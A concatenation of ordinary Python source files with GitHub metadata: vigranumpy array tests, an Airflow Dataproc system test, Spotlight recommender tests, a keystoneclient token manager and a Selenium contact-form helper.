b = copy.deepcopy(a)
assert numpy.all(a == b)
assert_equal(b.flags.c_contiguous, a.flags.c_contiguous)
assert_equal(b.flags.f_contiguous, a.flags.f_contiguous)
assert_equal(b.axistags, a.axistags)
a[0,0,0] += 42
assert b[0,0,0] != a[0,0,0]
a = arraytypes.RGBImage(numpy.random.random((3, 4, 10)), order='F')
b = copy.deepcopy(a)
assert numpy.all(a == b)
assert_equal(b.flags.c_contiguous, a.flags.c_contiguous)
assert_equal(b.flags.f_contiguous, a.flags.f_contiguous)
assert_equal(b.axistags, a.axistags)
a[0,0,0] += 42
assert b[0,0,0] != a[0,0,0]
def testDeepcopyWithAttributes():
a = arraytypes.Image((320, 200), order='C')
a.myCustomAttribute = 42
b = copy.deepcopy(a)
assert hasattr(b, "myCustomAttribute")
assert_equal(b.myCustomAttribute, 42)
def testDeepcopyWithCyclicReference():
a = arraytypes.Image((320, 200), order='C')
b = arraytypes.Image((320, 200), order='C')
a.myCustomAttribute = b
b.backLink = a
c = copy.deepcopy(a)
assert hasattr(c, "myCustomAttribute")
assert c.myCustomAttribute.backLink is c
def testPickle():
import pickle
a = arraytypes.RGBImage(numpy.random.random((10, 4, 3)), order='C')
s = pickle.dumps(a)
b = pickle.loads(s)
assert_equal(b.shape, a.shape)
assert_equal(b.strides, a.strides)
assert_equal(b.axistags, a.axistags)
assert numpy.all(a == b)
a = arraytypes.RGBImage(numpy.random.random((4, 10, 3)), order='V')
s = pickle.dumps(a)
b = pickle.loads(s)
assert_equal(b.shape, a.shape)
assert_equal(b.strides, a.strides)
assert_equal(b.axistags, a.axistags)
assert numpy.all(a == b)
a = arraytypes.RGBImage(numpy.random.random((3, 4, 10)), order='F')
s = pickle.dumps(a)
b = pickle.loads(s)
assert_equal(b.shape, a.shape)
assert_equal(b.strides, a.strides)
assert_equal(b.axistags, a.axistags)
assert numpy.all(a == b)
def testZMQ():
try:
import zmq
ctx = zmq.Context.instance()
sender = zmq.Socket(ctx, zmq.PUSH)
receiver = zmq.Socket(ctx, zmq.PULL)
sender.bind('inproc://a')
receiver.connect('inproc://a')
except:
return
a = arraytypes.RGBImage(numpy.random.random((10, 4, 3)), order='C')
a.sendSocket(sender, copy=False)
b = arraytypes.VigraArray.receiveSocket(receiver, copy=False)
assert_equal(b.shape, a.shape)
assert_equal(b.strides, a.strides)
assert_equal(b.axistags, a.axistags)
assert numpy.all(a == b)
a = arraytypes.RGBImage(numpy.random.random((4, 10, 3)), order='V')
a.sendSocket(sender, copy=False)
b = arraytypes.VigraArray.receiveSocket(receiver, copy=False)
assert_equal(b.shape, a.shape)
assert_equal(b.strides, a.strides)
assert_equal(b.axistags, a.axistags)
assert numpy.all(a == b)
a = arraytypes.RGBImage(numpy.random.random((3, 4, 10)), order='F')
a.sendSocket(sender, copy=False)
b = arraytypes.VigraArray.receiveSocket(receiver, copy=False)
assert_equal(b.shape, a.shape)
assert_equal(b.strides, a.strides)
assert_equal(b.axistags, a.axistags)
assert numpy.all(a == b)
def testSlicing():
a = arraytypes.Vector2Volume((5,4,3))
a.flat[...] = xrange(a.size)
tags = arraytypes.VigraArray.defaultAxistags('xyzc')
assert_equal(tags, a.axistags)
b = a[...]
assert_true((a==b).all())
assert_equal(tags, b.axistags)
b = a[...,0]
assert_equal(b.shape, a.shape[:-1])
assert_equal(b.axistags, arraytypes.VigraArray.defaultAxistags('xyz'))
assert_equal(b[3,2,1], a[3,2,1,0])
b = a[1,...]
assert_equal(b.shape, a.shape[1:])
assert_equal(b.axistags, arraytypes.VigraArray.defaultAxistags('yzc'))
assert_equal(b[3,2,1], a[1,3,2,1])
b = a[:,2,...]
assert_equal(b.shape, (5,3,2))
assert_equal(b.axistags, arraytypes.VigraArray.defaultAxistags('xzc'))
assert_equal(b[3,2,1], a[3,2,2,1])
b = a[:,1,2,...]
assert_equal(b.shape, (5,2))
assert_equal(b.axistags, arraytypes.VigraArray.defaultAxistags('xc'))
assert_equal(b[2,1], a[2,1,2,1])
b = a[2:4, :, 2, ...]
assert_equal(b.shape, (2, 4, 2))
assert_equal(b.axistags, arraytypes.VigraArray.defaultAxistags('xyc'))
assert_equal(b[0,2,1], a[2,2,2,1])
b = a[1:4, :, arraytypes.newaxis(arraytypes.AxisInfo.t), 1, ...]
assert_equal(b.shape, (3, 4, 1, 2))
assert_equal(b.axistags, arraytypes.VigraArray.defaultAxistags('xytc'))
assert_equal(b[0,2,0,0], a[1,2,1,0])
b = a[..., None, :,1]
assert_equal(b.shape, (5, 4, 1, 3))
rtags = arraytypes.AxisTags(arraytypes.AxisInfo.x, arraytypes.AxisInfo.y, arraytypes.AxisInfo(), arraytypes.AxisInfo.z)
assert_equal(b.axistags, rtags)
assert_equal(b[0,3,0,1], a[0,3,1,1])
b = a.subarray((4,3,2))
assert_equal(b.shape, (4,3,2,2))
assert_true((a[:4,:3,:2,:]==b).all())
assert_equal(tags, b.axistags)
b = a.subarray((1,1,1),(4,3,2))
assert_equal(b.shape, (3,2,1,2))
assert_true((a[1:4,1:3,1:2]==b).all())
assert_equal(tags, b.axistags)
b = a.subarray((1,1,1,1),(4,3,2,2))
assert_equal(b.shape, (3,2,1,1))
assert_true((a[1:4,1:3,1:2,1:]==b).all())
assert_equal(tags, b.axistags)
def testMethods():
a = arraytypes.ScalarImage((20, 30))
ones = arraytypes.ScalarImage((20, 30), value=1)
a.ravel()[...] = range(a.size)
for k, i in zip(a.flat, xrange(a.size)):
assert_equal(k, i)
assert (a.flatten() == range(a.size)).all()
assert (a >= 0).all()
assert not (a == 0).all()
assert (a == 0).any()
assert not (a == -1).any()
assert_equal(a.argmax(), a.size-1)
assert (a.argmax(axis='y') == a.shape[1]-1).all()
assert_equal(a.argmin(), 0)
assert (a.argmin(axis='y') == 0).all()
assert (ones.cumsum()-1 == a.ravel()).all()
oc = ones.cumsum(axis='x')-1
for s in oc.sliceIter('y'):
assert (s == range(a.shape[0])).all()
assert (ones.cumprod() == 1).all()
assert (ones.cumprod(axis='x') == 1).all()
assert_equal(a.max(), a.size-1)
assert (a.max(axis='y') == range(a.size-a.shape[0], a.size)).all()
assert_equal(a.mean(dtype=numpy.longdouble), (a.size - 1.0) / 2.0)
assert (a.mean(axis='y', dtype=numpy.longdouble) ==
range((a.size-a.shape[0])//2, (a.size+a.shape[0])//2)).all()
assert_equal(a.min(), 0)
assert (a.min(axis='y') == range(a.shape[0])).all()
n = arraytypes.ScalarImage(numpy.array([[1, 0, 0],[0, 1, 1],[1, 0, 1]]))
nz = n.nonzero()
assert (nz[0] == [0, 1, 1, 2, 2]).all()
assert_equal(nz[0].axistags, n.defaultAxistags('x'))
assert (nz[1] == [0, 1, 2, 0, 2]).all()
assert_equal(nz[1].axistags, n.defaultAxistags('y'))
assert_equal(ones.prod(), 1.0)
assert (ones.prod(axis='y') == [1]*ones.shape[0]).all()
assert_equal(a.ptp(), a.size-1)
assert (a.ptp(axis='x') == [a.shape[0]-1]*a.shape[1]).all()
r = arraytypes.ScalarImage((2,2))
r.ravel()[...] = range(4)
assert (r.repeat(1) == r.ravel()).all()
assert (r.repeat(2) == reduce(lambda x,y: x+[y,y], range(4), [])).all()
assert (r.repeat([0,1,2,3]) == [1,2,2,3,3,3]).all()
assert (r.repeat(2, axis='y').ravel() == [0,1,0,1,2,3,2,3]).all()
assert (r.repeat([1,2], axis='y').ravel() == [0,1,2,3,2,3]).all()
s = a[arraytypes.AxisInfo.c,:,arraytypes.AxisInfo.z,:,arraytypes.AxisInfo.t]
assert_equal(s.shape, (1, a.shape[0], 1, a.shape[1], 1))
assert_equal(s.axistags,a.defaultAxistags('cxzyt'))
ss = s.squeeze()
assert_equal(ss.shape, a.shape)
assert_equal(ss.axistags,a.axistags)
assert_equal(ones.std(dtype=numpy.longdouble), 0.0)
assert (ones.std(axis='x', dtype=numpy.longdouble) == [0.0]*a.shape[1]).all()
assert_equal(ones.sum(dtype=numpy.longdouble), ones.size)
assert (ones.sum(axis='x', dtype=numpy.longdouble) == [a.shape[0]]*a.shape[1]).all()
b = a.swapaxes(0, 1)
assert_equal(b.shape, (a.shape[1], a.shape[0]))
assert_equal(len(b.axistags), 2)
assert_equal(b.axistags[0], a.axistags[1])
assert_equal(b.axistags[1], a.axistags[0])
b = a.swapaxes(0, 1, keepTags=True)
assert_equal(b.shape, (a.shape[1], a.shape[0]))
assert_equal(len(b.axistags), 2)
assert_equal(b.axistags, a.axistags)
rt = r.take([1,2])
assert (rt == [1,2]).all()
assert_equal(rt.axistags, arraytypes.AxisTags(1))
rt = r.take([0,1], axis='y')
assert (rt == r).all()
assert_equal(rt.axistags, rt.axistags)
assert_equal(ones.var(dtype=numpy.longdouble), 0.0)
assert (ones.var(axis='x', dtype=numpy.longdouble) == [0.0]*a.shape[1]).all()
a = arraytypes.Image((5,4,3))
b = a.transpose()
assert_equal(b.shape, (3,4,5))
assert_equal(len(b.axistags), len(a.axistags))
assert_equal(b.axistags[0], a.axistags[2])
assert_equal(b.axistags[1], a.axistags[1])
assert_equal(b.axistags[2], a.axistags[0])
b = a.transpose((1,2,0))
assert_equal(b.shape, (4,3,5))
assert_equal(len(b.axistags), len(a.axistags))
assert_equal(b.axistags[0], a.axistags[1])
assert_equal(b.axistags[1], a.axistags[2])
assert_equal(b.axistags[2], a.axistags[0])
b = a.transpose(keepTags=True)
assert_equal(b.shape, (3,4,5))
assert_equal(len(b.axistags), len(a.axistags))
assert_equal(b.axistags, a.axistags)
b = a.transpose((1,2,0), keepTags=True)
assert_equal(b.shape, (4,3,5))
assert_equal(len(b.axistags), len(a.axistags))
assert_equal(b.axistags, a.axistags)
def testUfuncs():
from numpy import bool, int8, uint8, int16, uint16, int32, uint32, int64, uint64
from numpy import float32, float64, longdouble, complex64, complex128, clongdouble
integers = [ int8, uint8, int16, uint16, int32, uint32, int64, uint64]
floats = [float32, float64, longdouble]
compl = [complex64, complex128, clongdouble]
types = integers + floats + compl
arrays, ones = {}, {}
for t in types:
arrays[t] = arraytypes.ScalarImage((2,2), t, value=2)
ones[t] = arraytypes.ScalarImage((1,1), t, value=1)
for t, a in iteritems(arrays):
b = -a
assert_equal(t, b.dtype)
assert_equal(a.axistags, b.axistags)
if not numpyHasComplexNegateBug or t is not clongdouble:
assert (b == -t(2)).all()
b = a + a
assert_equal(t, b.dtype)
assert_equal(a.axistags, b.axistags)
assert (b == t(4)).all()
b = a == a
assert_equal(bool, b.dtype)
assert_equal(a.axistags, b.axistags)
assert (b == True).all()
b = ones[t] + a
assert_equal(a.shape, b.shape)
assert_equal(a.axistags, b.axistags)
assert_equal(t, b.dtype)
assert (b == t(3)).all()
b = a + ones[t]
assert_equal(a.shape, b.shape)
assert_equal(a.axistags, b.axistags)
assert_equal(t, b.dtype)
assert (b == t(3)).all()
b = 3 + a
assert_equal(t, b.dtype)
assert_equal(a.axistags, b.axistags)
assert (b == t(5)).all()
b = a + 3
assert_equal(t, b.dtype)
assert_equal(a.axistags, b.axistags)
assert (b == t(5)).all()
for i in integers:
a1 = arrays[i]
for j in integers:
if i == j:
continue
a2 = arrays[j]
b = a1 * a2
if a1.dtype.itemsize < 8 and a2.dtype.itemsize < 8:
assert_equal(int32, b.dtype)
else:
assert_equal(int64, b.dtype)
assert_equal(a1.axistags, b.axistags)
assert (b == 4).all()
b = a1 <= a2
assert_equal(bool, b.dtype)
assert_equal(a1.axistags, b.axistags)
assert (b == True).all()
for j in floats + compl:
a2 = arrays[j]
b = a1 * a2
assert_equal(j, b.dtype)
assert_equal(a1.axistags, b.axistags)
assert (b == 4).all()
b = a2 * a1
assert_equal(j, b.dtype)
assert_equal(a1.axistags, b.axistags)
assert (b == 4).all()
b = a1 >= a2
assert_equal(bool, b.dtype)
assert_equal(a1.axistags, b.axistags)
assert (b == True).all()
b = a2 > a1
assert_equal(bool, b.dtype)
assert_equal(a1.axistags, b.axistags)
assert (b == False).all()
b = a1 + 1
assert (b == 3).all()
assert_equal(a1.dtype, b.dtype)
assert_equal(a1.axistags, b.axistags)
b = a1 + 1.0
assert_equal(a1.axistags, b.axistags)
assert (b == 3.0).all()
if a1.dtype.itemsize < 8:
assert_equal(float32, b.dtype)
else:
assert_equal(float64, b.dtype)
for i in floats:
a1 = arrays[i]
for j in compl:
if i == j:
continue
a2 = arrays[j]
b = a1 * a2
assert_equal(j, b.dtype)
assert_equal(a1.axistags, b.axistags)
assert (b == 4).all()
b = a2 * a1
assert_equal(j, b.dtype)
assert_equal(a1.axistags, b.axistags)
assert (b == 4).all()
b = a1 >= a2
assert_equal(bool, b.dtype)
assert_equal(a1.axistags, b.axistags)
assert (b == True).all()
b = a2 > a1
assert_equal(bool, b.dtype)
assert_equal(a1.axistags, b.axistags)
assert (b == False).all()
b = a1 + 0.5
assert (b == 2.5).all()
assert_equal(a1.dtype, b.dtype)
assert_equal(a1.axistags, b.axistags)
fractional, integral = ufunc.modf(b)
assert (fractional == 0.5).all()
assert (integral == 2.0).all()
assert_equal(a1.dtype, fractional.dtype)
assert_equal(a1.axistags, fractional.axistags)
assert_equal(a1.dtype, integral.dtype)
assert_equal(a1.axistags, integral.axistags)
assert_equal(float64, (arrays[float32]+arrays[float64]).dtype)
assert_equal(float64, (arrays[float64]+arrays[float32]).dtype)
assert_equal(longdouble, (arrays[float32]+arrays[longdouble]).dtype)
assert_equal(longdouble, (arrays[longdouble]+arrays[float32]).dtype)
assert_equal(longdouble, (arrays[float64]+arrays[longdouble]).dtype)
assert_equal(longdouble, (arrays[longdouble]+arrays[float64]).dtype)
assert_equal(complex128, (arrays[complex64]+arrays[complex128]).dtype)
assert_equal(complex128, (arrays[complex128]+arrays[complex64]).dtype)
assert_equal(clongdouble, (arrays[complex64]+arrays[clongdouble]).dtype)
assert_equal(clongdouble, (arrays[clongdouble]+arrays[complex64]).dtype)
assert_equal(clongdouble, (arrays[complex128]+arrays[clongdouble]).dtype)
assert_equal(clongdouble, (arrays[clongdouble]+arrays[complex128]).dtype)
b = abs(arrays[complex64])
assert (b == 2.0).all()
assert_equal(float32, b.dtype)
assert_equal(arrays[complex64].axistags, b.axistags)
b = abs(arrays[complex128])
assert (b == 2.0).all()
assert_equal(float64, b.dtype)
assert_equal(arrays[complex128].axistags, b.axistags)
b = abs(arrays[clongdouble])
assert (b == 2.0).all()
assert_equal(longdouble, b.dtype)
assert_equal(arrays[clongdouble].axistags, b.axistags)
a = arraytypes.ScalarImage((2,2), uint8, value=255)
b = a + a
assert (b == 254).all()
b = a + 255
assert (b == 254).all()
b = 255 + a
assert (b == 254).all()
b = arraytypes.ScalarImage((2,2), int32, value=0)
bb = ufunc.add(a, a, b)
assert bb is b
assert (b == 510).all()
b = arraytypes.ScalarImage((2,2), int32, value=0)
bb = ufunc.add(a, 255, b)
assert bb is b
assert (b == 510).all()
b = arraytypes.ScalarImage((2,2), int32, value=0)
bb = ufunc.add(255, a, b)
assert bb is b
assert (b == 510).all()
| {
"content_hash": "07c4fa68d81a861f3f6101ea512b7e8d",
"timestamp": "",
"source": "github",
"line_count": 1704,
"max_line_length": 218,
"avg_line_length": 36.505868544600936,
"alnum_prop": 0.617110889624795,
"repo_name": "dstoe/vigra",
"id": "c5764cd97122797ce8304cb791e574c6df3bb9b3",
"size": "62208",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "vigranumpy/test/test_arraytypes.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "3203"
},
{
"name": "C",
"bytes": "113143"
},
{
"name": "C++",
"bytes": "21346826"
},
{
"name": "CMake",
"bytes": "105677"
},
{
"name": "CSS",
"bytes": "65018"
},
{
"name": "HTML",
"bytes": "471605"
},
{
"name": "Inno Setup",
"bytes": "6501"
},
{
"name": "JavaScript",
"bytes": "24066"
},
{
"name": "Jupyter Notebook",
"bytes": "3391055"
},
{
"name": "Matlab",
"bytes": "32719"
},
{
"name": "Python",
"bytes": "464605"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "TeX",
"bytes": "15209"
}
],
"symlink_target": ""
} |
import os
from tests.providers.google.cloud.operators.test_dataproc_operator_system_helper import DataprocTestHelper
from tests.providers.google.cloud.utils.gcp_authenticator import GCP_DATAPROC_KEY
from tests.test_utils.gcp_system_helpers import CLOUD_DAG_FOLDER, provide_gcp_context, skip_gcp_system
from tests.test_utils.system_tests_class import SystemTest
BUCKET = os.environ.get("GCP_DATAPROC_BUCKET", "dataproc-system-tests")
PYSPARK_MAIN = os.environ.get("PYSPARK_MAIN", "hello_world.py")
PYSPARK_URI = "gs://{}/{}".format(BUCKET, PYSPARK_MAIN)
@skip_gcp_system(GCP_DATAPROC_KEY, require_local_executor=True)
class DataprocExampleDagsTest(SystemTest):
helper = DataprocTestHelper()
@provide_gcp_context(GCP_DATAPROC_KEY)
def setUp(self):
super().setUp()
self.helper.create_test_bucket(BUCKET)
self.helper.upload_test_file(PYSPARK_URI, PYSPARK_MAIN)
@provide_gcp_context(GCP_DATAPROC_KEY)
def tearDown(self):
self.helper.delete_gcs_bucket_elements(BUCKET)
super().tearDown()
@provide_gcp_context(GCP_DATAPROC_KEY)
def test_run_example_dag(self):
self.run_dag(dag_id="example_gcp_dataproc", dag_folder=CLOUD_DAG_FOLDER)
| {
"content_hash": "712f66779e61a305519f6a2d983f8ba8",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 106,
"avg_line_length": 40.3,
"alnum_prop": 0.738626964433416,
"repo_name": "wileeam/airflow",
"id": "7c69c6b8e25c1258e74f28ae93a24a39dfe4042a",
"size": "1996",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tests/providers/google/cloud/operators/test_dataproc_system.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "13715"
},
{
"name": "Dockerfile",
"bytes": "17179"
},
{
"name": "HTML",
"bytes": "148281"
},
{
"name": "JavaScript",
"bytes": "25233"
},
{
"name": "Jupyter Notebook",
"bytes": "2933"
},
{
"name": "Mako",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "9763694"
},
{
"name": "Shell",
"bytes": "221331"
},
{
"name": "TSQL",
"bytes": "879"
}
],
"symlink_target": ""
} |
import os
import numpy as np
import pytest
from spotlight.cross_validation import user_based_train_test_split
from spotlight.datasets import synthetic
from spotlight.evaluation import sequence_mrr_score
from spotlight.layers import BloomEmbedding
from spotlight.sequence.implicit import ImplicitSequenceModel
from spotlight.sequence.representations import CNNNet, LSTMNet, PoolNet
RANDOM_SEED = 42
NUM_EPOCHS = 5
EMBEDDING_DIM = 32
BATCH_SIZE = 128
LOSS = 'bpr'
VERBOSE = True
CUDA = bool(os.environ.get('SPOTLIGHT_CUDA', False))
def _get_synthetic_data(num_users=100,
num_items=100,
num_interactions=10000,
randomness=0.01,
order=2,
max_sequence_length=10,
random_state=None):
interactions = synthetic.generate_sequential(num_users=num_users,
num_items=num_items,
num_interactions=num_interactions,
concentration_parameter=randomness,
order=order,
random_state=random_state)
print('Max prob {}'.format((np.unique(interactions.item_ids,
return_counts=True)[1] /
num_interactions).max()))
train, test = user_based_train_test_split(interactions,
random_state=random_state)
train = train.to_sequence(max_sequence_length=max_sequence_length,
step_size=None)
test = test.to_sequence(max_sequence_length=max_sequence_length,
step_size=None)
return train, test
def _evaluate(model, test):
test_mrr = sequence_mrr_score(model, test)
print('Test MRR {}'.format(
test_mrr.mean()
))
return test_mrr
@pytest.mark.parametrize('randomness, expected_mrr', [
(1e-3, 0.18),
(1e2, 0.03),
])
def test_implicit_pooling_synthetic(randomness, expected_mrr):
random_state = np.random.RandomState(RANDOM_SEED)
train, test = _get_synthetic_data(randomness=randomness,
random_state=random_state)
model = ImplicitSequenceModel(loss=LOSS,
batch_size=BATCH_SIZE,
embedding_dim=EMBEDDING_DIM,
learning_rate=1e-1,
l2=1e-9,
n_iter=NUM_EPOCHS,
random_state=random_state,
use_cuda=CUDA)
model.fit(train, verbose=VERBOSE)
mrr = _evaluate(model, test)
assert mrr.mean() > expected_mrr
@pytest.mark.parametrize('randomness, expected_mrr', [
(1e-3, 0.61),
(1e2, 0.03),
])
def test_implicit_lstm_synthetic(randomness, expected_mrr):
random_state = np.random.RandomState(RANDOM_SEED)
train, test = _get_synthetic_data(randomness=randomness,
random_state=random_state)
model = ImplicitSequenceModel(loss=LOSS,
representation='lstm',
batch_size=BATCH_SIZE,
embedding_dim=EMBEDDING_DIM,
learning_rate=1e-2,
l2=1e-7,
n_iter=NUM_EPOCHS * 5,
random_state=random_state,
use_cuda=CUDA)
model.fit(train, verbose=VERBOSE)
mrr = _evaluate(model, test)
assert mrr.mean() > expected_mrr
@pytest.mark.parametrize('randomness, expected_mrr', [
(1e-3, 0.65),
(1e2, 0.03),
])
def test_implicit_cnn_synthetic(randomness, expected_mrr):
random_state = np.random.RandomState(RANDOM_SEED)
train, test = _get_synthetic_data(randomness=randomness,
random_state=random_state)
model = ImplicitSequenceModel(loss=LOSS,
representation=CNNNet(train.num_items,
embedding_dim=EMBEDDING_DIM,
kernel_width=5,
num_layers=1),
batch_size=BATCH_SIZE,
learning_rate=1e-2,
l2=0.0,
n_iter=NUM_EPOCHS * 5,
random_state=random_state,
use_cuda=CUDA)
model.fit(train, verbose=VERBOSE)
mrr = _evaluate(model, test)
assert mrr.mean() > expected_mrr
@pytest.mark.parametrize('num_layers, dilation, expected_mrr', [
(1, (1,), 0.65),
(2, (1, 2), 0.65),
])
def test_implicit_cnn_dilation_synthetic(num_layers, dilation, expected_mrr):
random_state = np.random.RandomState(RANDOM_SEED)
train, test = _get_synthetic_data(randomness=1e-03,
num_interactions=20000,
random_state=random_state)
model = ImplicitSequenceModel(loss=LOSS,
representation=CNNNet(train.num_items,
embedding_dim=EMBEDDING_DIM,
kernel_width=3,
dilation=dilation,
num_layers=num_layers),
batch_size=BATCH_SIZE,
learning_rate=1e-2,
l2=0.0,
n_iter=NUM_EPOCHS * 5 * num_layers,
random_state=random_state,
use_cuda=CUDA)
model.fit(train, verbose=VERBOSE)
mrr = _evaluate(model, test)
assert mrr.mean() > expected_mrr
@pytest.mark.parametrize('randomness, expected_mrr', [
(1e-3, 0.3),
(1e2, 0.03),
])
def test_implicit_lstm_mixture_synthetic(randomness, expected_mrr):
random_state = np.random.RandomState(RANDOM_SEED)
train, test = _get_synthetic_data(randomness=randomness,
random_state=random_state)
model = ImplicitSequenceModel(loss=LOSS,
representation='mixture',
batch_size=BATCH_SIZE,
embedding_dim=EMBEDDING_DIM,
learning_rate=1e-2,
l2=1e-7,
n_iter=NUM_EPOCHS * 10,
random_state=random_state,
use_cuda=CUDA)
model.fit(train, verbose=VERBOSE)
mrr = _evaluate(model, test)
assert mrr.mean() > expected_mrr
@pytest.mark.parametrize('loss, expected_mrr', [
('pointwise', 0.15),
('hinge', 0.16),
('bpr', 0.18),
('adaptive_hinge', 0.16),
])
def test_implicit_pooling_losses(loss, expected_mrr):
random_state = np.random.RandomState(RANDOM_SEED)
train, test = _get_synthetic_data(randomness=1e-3,
random_state=random_state)
model = ImplicitSequenceModel(loss=loss,
batch_size=BATCH_SIZE,
embedding_dim=EMBEDDING_DIM,
learning_rate=1e-1,
l2=1e-9,
n_iter=NUM_EPOCHS,
random_state=random_state,
use_cuda=CUDA)
model.fit(train, verbose=VERBOSE)
mrr = _evaluate(model, test)
assert mrr.mean() > expected_mrr
@pytest.mark.parametrize('compression_ratio, expected_mrr', [
(0.2, 0.14),
(0.5, 0.30),
(1.0, 0.5),
])
def test_bloom_cnn(compression_ratio, expected_mrr):
random_state = np.random.RandomState(RANDOM_SEED)
train, test = _get_synthetic_data(randomness=1e-03,
num_interactions=20000,
random_state=random_state)
embedding = BloomEmbedding(train.num_items,
32,
compression_ratio=compression_ratio,
num_hash_functions=2)
representation = CNNNet(train.num_items,
embedding_dim=EMBEDDING_DIM,
kernel_width=3,
item_embedding_layer=embedding)
model = ImplicitSequenceModel(loss=LOSS,
representation=representation,
batch_size=BATCH_SIZE,
learning_rate=1e-2,
l2=0.0,
n_iter=NUM_EPOCHS,
random_state=random_state,
use_cuda=CUDA)
model.fit(train, verbose=VERBOSE)
mrr = _evaluate(model, test)
assert mrr.mean() > expected_mrr
@pytest.mark.parametrize('compression_ratio, expected_mrr', [
(0.2, 0.18),
(0.5, 0.40),
(1.0, 0.60),
])
def test_bloom_lstm(compression_ratio, expected_mrr):
random_state = np.random.RandomState(RANDOM_SEED)
train, test = _get_synthetic_data(randomness=1e-03,
num_interactions=20000,
random_state=random_state)
embedding = BloomEmbedding(train.num_items,
32,
compression_ratio=compression_ratio,
num_hash_functions=4)
representation = LSTMNet(train.num_items,
embedding_dim=EMBEDDING_DIM,
item_embedding_layer=embedding)
model = ImplicitSequenceModel(loss=LOSS,
representation=representation,
batch_size=BATCH_SIZE,
learning_rate=1e-2,
l2=1e-7,
n_iter=NUM_EPOCHS * 5,
random_state=random_state,
use_cuda=CUDA)
model.fit(train, verbose=VERBOSE)
mrr = _evaluate(model, test)
assert mrr.mean() > expected_mrr
@pytest.mark.parametrize('compression_ratio, expected_mrr', [
(0.2, 0.06),
(0.5, 0.07),
(1.0, 0.13),
])
def test_bloom_pooling(compression_ratio, expected_mrr):
random_state = np.random.RandomState(RANDOM_SEED)
train, test = _get_synthetic_data(randomness=1e-03,
num_interactions=20000,
random_state=random_state)
embedding = BloomEmbedding(train.num_items,
32,
compression_ratio=compression_ratio,
num_hash_functions=2)
representation = PoolNet(train.num_items,
embedding_dim=EMBEDDING_DIM,
item_embedding_layer=embedding)
model = ImplicitSequenceModel(loss=LOSS,
representation=representation,
batch_size=BATCH_SIZE,
learning_rate=1e-2,
l2=1e-7,
n_iter=NUM_EPOCHS * 5,
random_state=random_state,
use_cuda=CUDA)
model.fit(train, verbose=VERBOSE)
mrr = _evaluate(model, test)
assert mrr.mean() > expected_mrr
| {
"content_hash": "2152577b4b74c3968bc96ec70ac854ed",
"timestamp": "",
"source": "github",
"line_count": 340,
"max_line_length": 84,
"avg_line_length": 35.63235294117647,
"alnum_prop": 0.4741229880313661,
"repo_name": "maciejkula/spotlight",
"id": "a3f89eb66d113b6c73147ee4e4684abac7fca88d",
"size": "12115",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/sequence/test_sequence_implicit.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "147302"
},
{
"name": "Shell",
"bytes": "3427"
}
],
"symlink_target": ""
} |
from keystoneclient import base
from keystoneclient import utils
class Token(base.Resource):
def __repr__(self):
return "<Token %s>" % self._info
@property
def id(self):
return self._info['token']['id']
@property
def expires(self):
return self._info['token']['expires']
@property
def tenant(self):
return self._info['token'].get('tenant')
class TokenManager(base.Manager):
resource_class = Token
@utils.positional(enforcement=utils.positional.WARN)
def authenticate(self, username=None, tenant_id=None, tenant_name=None,
password=None, token=None, return_raw=False):
if token:
params = {"auth": {"token": {"id": token}}}
elif username and password:
params = {"auth": {"passwordCredentials": {"username": username,
"password": password}}}
else:
raise ValueError('A username and password or token is required.')
if tenant_id:
params['auth']['tenantId'] = tenant_id
elif tenant_name:
params['auth']['tenantName'] = tenant_name
reset = 0
if self.api.management_url is None:
reset = 1
self.api.management_url = self.api.auth_url
token_ref = self._create('/tokens', params, "access",
return_raw=return_raw)
if reset:
self.api.management_url = None
return token_ref
def delete(self, token):
return self._delete("/tokens/%s" % base.getid(token))
def endpoints(self, token):
return self._get("/tokens/%s/endpoints" % base.getid(token), "token")
| {
"content_hash": "69e9349f3f9518a246ca67292840af09",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 78,
"avg_line_length": 32.58490566037736,
"alnum_prop": 0.5639837869137232,
"repo_name": "jamielennox/python-keystoneclient",
"id": "53ea1da97333c44e90a79c42f1383a29edf00c00",
"size": "2300",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "keystoneclient/v2_0/tokens.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "16002"
},
{
"name": "JavaScript",
"bytes": "7403"
},
{
"name": "Python",
"bytes": "1130767"
},
{
"name": "Shell",
"bytes": "12048"
}
],
"symlink_target": ""
} |
from fixture.TestBase import BaseClass
from selenium.webdriver.firefox.webdriver import WebDriver
class Contract:
def __init__(self, first_name=None, middle_name=None, last_name=None, nickname=None, title=None, company_name=None,
address_name=None, home=None, mobile=None, work=None, fax=None, email1=None, email2=None, email3=None,
homepage=None, address=None, phone=None, notes=None):
self.first_name = first_name
self.middle_name = middle_name
self.last_name = last_name
self.nickname = nickname
self.title = title
self.company_name = company_name
self.address_name = address_name
self.home = home
self.mobile = mobile
self.work = work
self.fax = fax
self.email1 = email1
self.email2 = email2
self.email3 = email3
self.homepage = homepage
self.address = address
self.phone = phone
self.notes = notes
class ContractBase():
def __init__(self):
self.wd = WebDriver()
self.wd.implicitly_wait(60)
self.session = BaseClass(self)
def add_contract(self):
wd = self.wd
wd.find_element_by_link_text("add new").click()
wd.find_element_by_name("email").click()
wd.find_element_by_name("email").clear()
wd.find_element_by_name("email").send_keys()
def add_full_name(self, Contract):
wd = self.wd
if Contract.first_name:
wd.find_element_by_name("firstname").click()
wd.find_element_by_name("firstname").clear()
wd.find_element_by_name("firstname").send_keys("%s" % Contract.first_name)
if Contract.middle_name:
wd.find_element_by_name("middlename").click()
wd.find_element_by_name("middlename").clear()
wd.find_element_by_name("middlename").send_keys("%s" % Contract.middle_name)
if Contract.last_name:
wd.find_element_by_name("lastname").click()
wd.find_element_by_name("lastname").clear()
wd.find_element_by_name("lastname").send_keys("%s" % Contract.last_name)
if Contract.nickname:
wd.find_element_by_name("nickname").click()
wd.find_element_by_name("nickname").clear()
wd.find_element_by_name("nickname").send_keys("%s" % Contract.nickname)
def add_title(self, Contract):
wd = self.wd
